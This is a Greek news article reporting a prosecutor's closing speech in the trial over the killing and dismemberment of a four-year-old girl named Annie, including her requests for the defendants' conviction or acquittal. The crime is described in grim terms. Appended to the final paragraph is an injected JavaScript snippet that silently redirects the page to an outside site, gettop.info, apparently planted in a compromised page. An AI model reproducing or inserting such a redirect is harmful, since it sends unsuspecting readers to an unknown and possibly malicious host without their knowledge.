Εισαγγελέας: Νίκι και Σάββας τεμάχισαν την Άννυ με μεθοδικότητα

0
20

 

Την ενοχή του πατέρα της Άννυ Στάνισλαβ Μπαρκατζίεβ ή Σάββα και του φίλου του Ναζίφ Αχμέντοφ ή Νικολάι για το «τραγικότερο και από της Ιφιγένειας» τέλος της 4χρονης ζήτησε με την αγόρευσή της η εισαγγελέας Έδρας του Μικτού Ορκωτού Δικαστηρίου.

«Μετά από δέκα συνεδριάσεις, ολοκληρώθηκε η ακροαματική διαδικασία αυτής της φρικιαστικής, μοναδικής στα παγκόσμια χρονικά, υπόθεσης» είπε κατά την έναρξη της αγόρευσής της η κυρία Μαρία Δημητριάδου που ζήτησε παράλληλα την απαλλαγή της μητέρας της Άννυ,Δημητρίνα Μπορίσοβα για την έκθεση ανηλίκου σε κίνδυνο, αλλά την ενοχή της κατηγορουμένης μόνο για το πλημμέλημα της ψευδορκίας, για το οποίο ακόμη και αν η κατηγορουμένη καταδικαστεί θα παραμείνει ελεύθερη.

Για τον τέταρτο κατηγορούμενο ιδιοκτήτη διαμερίσματος που οι γονείς της Άννυ βρήκαν καταφύγιο, η εισαγγελέας ζήτησε την ενοχή του για το αδίκημα της ψευδορκίας.

Όπως τόνισε η κυρία Δημητριάδου στην αγόρευσή της ζητώντας την ενοχή των δύο ανδρών: «Ψυχροί, παγεροί και χωρίς συναίσθημα, σκότωσαν με οξύ και βίαιο τρόπο το παιδί και με νηφαλιότητα σχεδίασαν τον τεμαχισμό για να αποκρύψουν πώς πέθανε» και συμπλήρωσε: «Ο Σάββας και ο Νικολάι δολοφόνησαν και τεμάχισαν από κοινού την Άννυ σε ήρεμη ψυχική κατάσταση. Ο τεμαχισμός έγινε, όχι γιατί ήθελαν να εξαφανίσουν το πτώμα της μικρής, αλλά για να εξαφανίσουν το πώς εκείνη πέθανε. Τι έγινε εκείνο το βράδυ στο διαμέρισμα – σφαγείο της Μιχαήλ Βόδα μόνο εκείνοι ξέρουν. Είναι ένα φρικιαστικό έγκλημα, μοναδικό ίσως στα παγκόσμια χρονικά… Κάτι αντίστοιχο με τεμαχισμό μπορώ να φανταστώ μόνο με την περίπτωση Φραντζή».

Η εισαγγελέας επεσήμανε ότι ο Σάββας και ο Νικολάι «σχεδίασαν και εκτέλεσαν από κοινού. Στόχο είχαν, όχι την εξαφάνιση της Άννυ, αλλά του τρόπου με τον οποίο πέθανε το παιδί, ώστε ακόμα και η πιθανότητα ανεύρεσης του πτώματος να μην μπορεί να δείξει τον τρόπο θανάτου. Ο λόγος που το σπίτι έγινε σφαγείο, είναι να αποκρυβεί πώς πέθανε η Άννυ».

Αναφερόμενη στον πατέρα της Άννυ, Στάνισλαβ Μπαρκατζίεβ ή Σάββα, που παραδέχθηκε ότι τεμάχισε αλλά όχι ότι δολοφόνησε το παιδί του, η εισαγγελέας είπε: «Είναι αμετανόητος, το μόνο που τον νοιάζει είναι να φύγει από πάνω του το κακούργημα της ανθρωποκτονίας και να μείνει το αδίκημα της περιύβρισης νεκρού (σ.σ. για τον τεμαχισμό) που προβλέπει μόνο δυο χρόνια ποινή φυλάκισης». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here